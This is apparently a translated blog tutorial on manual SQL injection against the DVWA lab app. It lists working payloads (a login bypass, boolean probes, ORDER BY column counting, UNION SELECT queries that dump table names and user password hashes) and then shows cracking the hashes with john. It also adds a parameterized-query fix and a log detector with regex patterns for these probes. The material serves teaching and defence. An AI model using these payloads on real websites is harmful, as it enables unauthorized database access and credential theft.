Small white diary 39: Kali penetration testing, web infiltration - SQL manual injection (I)

Source: Internet
Author: User

SQL Manual Injection (i)

SQL injection: by inserting SQL commands into a web form submission, or into the query string of a domain name or page request, the attacker ends up with a malicious SQL command that the server executes as if it were legitimate. "The principle of SQL injection"

# The server-side program takes the user's input as query criteria, splices it directly into the SQL statement, and returns the query result to the client browser

User login check

SELECT * from users WHERE user='uname' and password='pass'

With the password input ' or ''=' the statement becomes:

SELECT * from users WHERE user='name' and password='' or ''=''

"or" is a logical operator: the password comparison is false, but ''='' (or '1'='1') is true, so the whole WHERE condition is true.
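The login check above implemented two ways, as an added example that is not part of the original notes: the spliced query the notes describe beside a parameterized one. The in-memory SQLite table and the credentials are constructed, and the password is stored in plaintext only to mirror the notes.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the notes' users table (plaintext password, as in the notes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn

def login_vulnerable(conn, user, password):
    """The pattern from the notes: input spliced straight into the SQL text.
    A password of  ' or ''='  yields  ... and password='' or ''=''  which is always true."""
    sql = f"SELECT * FROM users WHERE user='{user}' AND password='{password}'"
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, user, password):
    """Fix: a parameterized query. The driver passes the values separately from the
    SQL text, so quotes inside the input are data, never syntax."""
    sql = "SELECT * FROM users WHERE user=? AND password=?"
    return conn.execute(sql, (user, password)).fetchone() is not None
```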

Where SQL injection exists

Form fields, and URLs that pass parameters with the GET method

SQL detection methods

1. Error-based detection (low)

' (a single quote)

'' (try two single quotes): result: the second quote closes the string again, so no error

' a "b (single quote + a + double quote + b)

' a "b' (single quote + a + double quote + b + single quote)

If the errors follow how the quotes pair up, it proves that complex SQL statements can be constructed for injection




2. Boolean-based detection

First: 1' and '1'='1 (equivalent to 1' and '1'). Guessed statement: Select first_name,surname from users where id='1' and '1'='1'

Second: 1' and '1'='2 (equivalent to 1' and '0'). If no result is returned, the guessed statement is verified

3. Number of columns in the table / which column displays information

' ORDER by 9--+ (single quote + ORDER BY + space + number). The number refers to a column position; change it and watch for errors to find the exact number of columns. "--+": be sure there is a space after -- (the + is decoded as a space in the URL), otherwise MySQL raises a syntax error; -- starts a comment

Constructing a SELECT statement

4. Union query "runs a second query after the injected single quote closes the original string"

UNION and UNION ALL behave basically the same

First: ' Union select 1,2--+ determines where each column's result appears on the page after the query

Second: 1' Union Select user(),2--+ "1" is replaced with the built-in function user() to query the database user

' Union Select user(),version()--+ "replace 2 with the function version() to query the database version"

database() queries the name of the current database

Global variables: @@datadir queries the file location of the database

@@hostname queries the host name

@@version_compile_os queries the operating system version

Constructing a complex SQL statement

' Union Select database(),substring_index(user(),"@",1)--+ (substring_index keeps the part of user() before the @)

For easier viewing of the statements, use the Firefox plugin HackBar; press F9 to bring it up

Bypassing mechanisms whose filtering is not tight

CHAR() converts ASCII codes to the corresponding characters

Concatenation functions

CONCAT_WS() joins multiple values together with a separator

MD5() computes an MD5 hash "can be used to make someone else's server resources compute large amounts of data for you"

Understanding the data structure of a database

MySQL: all metadata is kept in the metadata database information_schema

1. List all tables in all databases / count the tables in each database

' Union select table_name,table_schema from information_schema.tables--+ [all tables in all databases]

' UNION select table_schema,count(*) from information_schema.tables GROUP BY table_schema--+ [number of tables in each database]

2. The table names in the dvwa database "a single vulnerable parameter is enough to dump the whole database"

' Union select table_name,table_schema from information_schema.tables where table_schema='dvwa'--+ "guess the location of accounts and passwords from the table names"

3. Query all the columns in the users table (user_id, first_name, last_name, user, password, avatar)

' Union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'--+

4. Query the contents of the user and password columns

' Union select user,password from dvwa.users--+

' Union select user,password from users--+

' Union select NULL,CONCAT(user,0x3a,password) from users--+ "CONCAT: concatenation; 0x3a is the ':' delimiter"
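Detection logic for the probing steps walked through above (stray quote, boolean test, ORDER BY counting, UNION extraction, information_schema enumeration), as an added example that is not part of the original notes. The access-log lines, client IPs and the DVWA path /vulnerabilities/sqli/ are constructed for the example; the patterns are assumed heuristics, not a complete WAF ruleset.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines modelled on the DVWA probes in these notes (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4521
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 500 1021
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /vulnerabilities/sqli/?id=1%27+and+%271%27%3D%271&Submit=Submit HTTP/1.1" 200 4521
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /vulnerabilities/sqli/?id=%27+ORDER+by+9--+&Submit=Submit HTTP/1.1" 500 1021
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /vulnerabilities/sqli/?id=%27+Union+select+Table_name%2Ctable_schema+from+information_schema.tables--+&Submit=Submit HTTP/1.1" 200 9876
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# One assumed pattern per probing step in the notes; matched on the URL-decoded parameter value.
PATTERNS = {
    "quote_probe": re.compile(r"'\s*$"),                              # step 1: stray closing quote
    "boolean_probe": re.compile(r"'\s*(and|or)\s*'[^']*'\s*=\s*'"),   # step 2: ' and '1'='1
    "order_by": re.compile(r"\border\s+by\s+\d+"),                    # step 3: column counting
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),       # step 4: union extraction
    "information_schema": re.compile(r"\binformation_schema\."),      # metadata enumeration
}

def classify(value):
    """Names of the probe patterns that a single decoded parameter value matches."""
    v = value.lower()
    return [name for name, rx in PATTERNS.items() if rx.search(v)]

def scan_log(text):
    """One finding per matching request: (client ip, parameter, pattern names, status)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:  # parse_qs already decodes %27 and turns '+' into a space
                hits = classify(value)
                if hits:
                    findings.append((m["ip"], name, hits, int(m["status"])))
    return findings

def suspicious_clients(findings, min_patterns=2):
    """Clients that walked through at least min_patterns distinct probing steps."""
    seen = {}
    for ip, _, hits, _ in findings:
        seen.setdefault(ip, set()).update(hits)
    return {ip for ip, pats in seen.items() if len(pats) >= min_patterns}
```

A client that moves through several of these steps in sequence, especially with 500 responses on the error-based probes, is a much stronger signal than any single matching request.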

5. Password cracking

Identify the hash algorithm: hash-identifier

username:passhash --> dvwa.txt "put the account:password pairs into a text file"

john --format=raw-md5 dvwa.txt
